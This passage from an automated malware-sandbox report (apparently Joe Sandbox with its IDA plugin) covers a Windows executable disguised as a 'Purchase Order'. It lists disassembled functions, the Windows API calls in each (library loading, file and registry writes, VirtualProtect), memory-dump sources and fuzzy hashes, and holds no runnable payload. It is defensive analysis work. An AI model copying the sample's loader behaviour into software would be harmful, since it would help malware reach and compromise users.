                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                            • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                            • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                            • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                            Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                            • Instruction ID: 8ee55578b336c0276868c1e88f1fd45be51d25fee0972e3c110634e7b38d832d
                                            • Opcode Fuzzy Hash: 476e1375ed2ebf99e134ffac4da93d8f4435b4a70c73a61f3ceb60b83f009d87
                                            • Instruction Fuzzy Hash: 8BE01A72E082008FE724ABA5AA495AD77B8EB90325B20847FE211F11D1DA7858419F69
                                            Function 00406694 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                              • Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                              • Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
                                              • Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040668A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                            • Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
                                            • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                            • Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D
                                            Function 00405DB0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405DB4
                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405DD6
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                            Function 0040586E Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,?,0000000A), ref: 00405874
                                            • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 00405882
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                            • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                            • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                            • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                            Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                              • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FilePointerwsprintf
                                            • String ID:
                                            • API String ID: 327478801-0
                                            • Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                            • Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
                                            • Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                            • Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D
                                            Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringWrite
                                            • String ID:
                                            • API String ID: 390214022-0
                                            • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                            • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                            • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                            • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                            Function 00406155 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                            • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                            • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                            Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • SearchPathW.KERNELBASE(?,00000000,?,?,?,?,000000FF), ref: 00401749
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: PathSearch
                                            • String ID:
                                            • API String ID: 2203818243-0
                                            • Opcode ID: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                            • Instruction ID: 76b1046b3576aa71ae923c826af07df126468053c341a8b382c9c50c66927564
                                            • Opcode Fuzzy Hash: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                            • Instruction Fuzzy Hash: EFE0DF72700100EAE710DFA4DE48EAA33A8DF40368B30813AF611B60C0E6B4A9419B2D
                                            Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,?,00000000), ref: 00405E76
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                            • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                            • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                            Function 00405E33 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403344,00000000,00000000,00403168,?,?,00000000,00000000,00000000), ref: 00405E47
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                            • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                            • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                            Function 73CF2997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(73CF405C,?,?,73CF404C), ref: 73CF29B5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: f59ec2b108597a3a065557cc140b5c986e6c73f7c06a157e0f604f29401ca6bb
                                            • Instruction ID: ba7e7acdc16cf0fe714d39e9334e2737225f41129d74443b023d7b1fd8d3c007
                                            • Opcode Fuzzy Hash: f59ec2b108597a3a065557cc140b5c986e6c73f7c06a157e0f604f29401ca6bb
                                            • Instruction Fuzzy Hash: 43F0A5B35042E3EFC390EF6A8444F053BF0E348304B21452AE1ADDE251E3344844CF15
                                            Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
                                            • String ID:
                                            • API String ID: 1096422788-0
                                            • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                            • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                            • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                            • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                            Function 00406127 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                            Function 00403347 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,?,0000000A), ref: 00403355
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
